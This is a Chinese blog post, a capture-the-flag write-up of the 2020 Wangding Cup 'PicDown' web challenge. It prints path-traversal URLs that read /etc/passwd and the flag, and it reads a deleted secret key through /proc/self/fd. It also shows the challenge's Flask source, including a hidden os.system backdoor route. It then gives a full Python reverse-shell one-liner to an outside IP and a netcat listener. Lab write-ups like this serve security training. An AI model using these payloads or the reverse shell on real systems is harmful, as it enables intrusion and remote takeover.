[网鼎杯 2020 白虎组]PicDown

最新推荐文章于 2023-10-08 17:26:40 发布
最新推荐文章于 2023-10-08 17:26:40 发布
阅读量1k 收藏 1
点赞数 2
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyaowangchuan/article/details/114540227
版权

在这里插入图片描述
框框里面输入123
在这里插入图片描述

可以看到url变成了这样

http://59193e2f-62ad-4629-88b4-86b773d82d4e.node3.buuoj.cn/page?url=123

试试

http://59193e2f-62ad-4629-88b4-86b773d82d4e.node3.buuoj.cn/page?url=../../../../etc/passwd

在这里插入图片描述
存在任意文件下载
再猜猜这

http://59193e2f-62ad-4629-88b4-86b773d82d4e.node3.buuoj.cn/page?url=../../../../flag

下载的文件里面有flag
在这里插入图片描述
在这里插入图片描述
flag也是对的
但是
总觉得过于简单了
就去看其他的wp
目录穿越甚至都不需要
linux proc/pid/信息说明
读取当前进程执行命令/proc/self/cmdline
在这里插入图片描述
可以看到py2执行了app.py
读取这个.py
在这里插入图片描述

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)

@app.route('/')
def index():
    return render_template('search.html')
    
@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)

@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

码审计发现,no_one_know_the_manager页面下接收key和shell,key要求和secret_key一样
在这里插入图片描述

读取不了
wp说这个文件是用open打开的,会创建文件描述符,直接读这个文件描述符中的内容就好了

在这里插入图片描述
q89ImvV/PaluFtktsdt2pD5kuHXVfWUUIktDvMw+4Zo=
在这里插入图片描述
错了
url编码试试
在这里插入图片描述

%71%38%39%49%6d%76%56%2f%50%61%6c%75%46%74%6b%74%73%64%74%32%70%44%35%6b%75%48%58%56%66%57%55%55%49%6b%74%44%76%4d%77%2b%34%5a%6f%3d

在这里插入图片描述
好啦
py脚本反弹shell
在BUU新建一个小号,从basic分类开启一台靶机,ssh连接
在这里插入图片描述
在这里插入图片描述
执行nc -lvp 7777
在这里插入图片描述
反弹脚本

python -c "import
os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('172.16.154.239',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

url编码
在这里插入图片描述
在这里插入图片描述
连上之后就cat /root/flag.txt

wuyaoooo
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
2020-杯-白虎组-Web-PicDown(可复现) | 考查/proc文件系统应用
一醉一休的博客
08-22 673
利用linux下面的一个特性,系统中如果一个程序打开了一个文件没有关闭,即便从外部(如os.remove(SECRET_FILE))删除之后,在 /proc 这个进程的 pid 目录下的 fd 文件描述符目录下还是会有这个文件的 fd,通过这个我们即可得到被删除文件的内容,/proc/[pid]/fd 这个目录里包含了进程打开文件的情况,pid是进程记录的打开文件的序号。解决这两个问题,虚拟机服务器成功运行后,重新反弹shell,还是不行(裂开!🍺暴力破解最后一个数字,这道题是3,
杯2020.txt
05-24
杯2020白虎组部分题目链接:https://pan.baidu.com/s/1_8iThteUQKj2jBg95nkzEQ 提取码:inrl
2020年白虎组赛题.zip
05-15
比赛试题附件,其中包括misc,re,crypto,pwn,web只有题目,没有环境,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
白虎组.zip
05-15
2020年第二届 络安全大赛白虎组 线下赛 真题 pwn reserve web misc 按照“杯”大赛两年一届的举办原则,第二届“杯”大赛5月开赛,6月19日至21日在广东省深圳市举办线下半决赛、总决赛和颁奖典礼。
渗透测试——学习准备
introverted的博客
05-30 1573
虚拟机安装搭建 渗透虚拟机 测试虚拟机 编译环境调试 脚本python php asp aspx java jdk 易语言 相关快捷工具 光速搜索 遍历工具 notepad++ editplus等 web安全经验之谈: 漏洞 攻击 技巧 思路 漏洞: 产生条件,实现价值,应用范围 攻击: 攻击特点,攻击手法,攻击发现 技巧思路: 资料文档,举一反三,反复多练 欢迎使用Markdown编辑器 ...
python爬虫之多线程threading、多进程multiprocessing、协程aiohttp 批量下载图片
10-21 1万+
对于多任务爬虫来说,多线程、多进程、协程这几种方式处理效率的排序为:aiohttp协程 > 多线程 > 多进程。但是aiohttp协程难度有点复杂,需要了解,而且本人目前没有解决协程下载大尺寸图片不完整的情况,还需要后续继续学习。
[杯 2020 白虎组]PicDown(精讲)
记录学习,一起进步
03-24 684
[杯 2020 白虎组]PicDown(精讲)
/proc/self/目录的意义
dillanzhou的博客
09-28 1万+
我们都知道可以通过/proc/$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息,linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得的信...
杯 2020 白虎组】PicDown
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
08-25 768
杯 2020 白虎组】PicDown复现Writeup
[杯 2020 白虎组]PicDown(任意文件读取)
qq_62046696的博客
12-27 439
打开界面发现有一个get传参然后,尝试任意文件读取漏洞,/etc/passwd看一下,提示下载了一个jpg图片然后打不开只能用 010查看一下信息 看来是猜对了,然后 如果日记没删掉可以查看历史记录 .bash_history呃呃呃差不到,那就看一下现在的进程python 2的app.py文件,直接读取 源码出来了,解析一下 这一块可以分析一下,我们需要获得SECRET_KEY的值,然后使key等于,最后shell进行命令执行,但是看完以后那个文件被删除了,我们怎么获得呢?后面这个3怎么来的呢,
2020杯青龙组白虎组部分试题.rar
05-14
2020杯青龙组白虎组部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次青龙难度大于白虎
页图片批量下载精灵v1.6特别版
07-28
图片批量下载精灵是一款从站上下载图片的共享软件,它可以把站上的图片都下载下来... 使用方法 安装原版,解压缩附件(PicDown-patch.rar)到目录下,用附件运行程序即可(即以后直接运行PicDown-patch.exe就可以了)~
Markdown快速入门
Cattle_group的博客
03-19 6756
Markdown快速入门 Markdown标题 1、使用=和-标记一级和二级标题 我展示的是一级标题 ============== 我展示的是二级标题 -------------- 显示效果如下图: 1、使用#号标记 # 一级标题 ## 二级标题 ### 三级标题 #### 四级标题 ##### 五级标题 ###### 六级标题 Markdown段落格式 1、段落的换行 Markdown 段落的换行是使用两个以上空格加上回车 当然也可以在段落后面使用一个空行来表示重新开始一个段落。 2、字体
Markdown 调整图片位置与大小
Dablelv 的博客专栏。
08-22 1万+
如果您使用的 Markdown 编辑器支持 CSS 样式的话,那么可以使用 CSS zoom 属性对图片相对于自身大小进行等比缩放。如果一定要宽高按照不同比例进行缩放,那么可以计算好缩放后的宽高像素值,采用下面指定宽高像素值的方式来实现。一个通用可行的办法是指定宽或高的绝对数值进行等比缩放,只指定宽和高中一个。本文的示例图片尺寸为 481*279px,那么设置图片宽度为 240px 或高度为 140px 即可将图片宽高等比缩小为原来的一半。的作用是改变缩放的中心点位置为左上角,而非默认的中心位置。
Markdown编辑器的使用
modao的博客
05-25 1810
本文主要对于markdown(csdn)编辑器的使用,,包括锚点的使用,文本的样式调整、图片的对齐、表格的样式等。本文从上查找资料而来,也要归于上,除了方便自己之外,也想将经验知识分享给别人。
手把手教会你使用Markdown【从入门到精通一篇就够了】
热门推荐
qq_40818172的博客
08-10 8万+
手把手教会你使用Markdown【从入门到精通一篇就够了】
【Markdown常用语法总结】
ZTH_G的博客
04-02 2796
Markdown 是一种轻量级标记语言,创始人为约翰·格鲁伯(John Gruber)。它允许人们使用易读易写的纯文本格式编写文档,然后转换成有效的 XHTML(或者HTML)文档。Markdown支持HTML语法。
[杯 2020 白虎组]PicDown python反弹shell proc/self目录的信息
最新发布
m0_64180167的博客
10-08 143
这里确实完全不会 第一次遇到一个只有文件读取思路的题目这里也确实说明还是要学学一些其他的东西了首先打开环境只存在一个框框 我们通过 目录扫描 抓包 注入 发现没有用我们测试能不能任意文件读取发现读取成功其次我到这里就没有思路了我们首先学东西吧当遇到文件读取我们可以读取什么。
[杯 2020 白虎组]picdown
03-16
picdown 是一个图片下载工具,可以通过输入图片链接,将图片下载到本地。它可以支持多线程下载,提高下载速度。同时,它还可以对下载的图片进行重命名和分类保存。这个工具在站开发和图片爬虫方面都有很大的用处。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值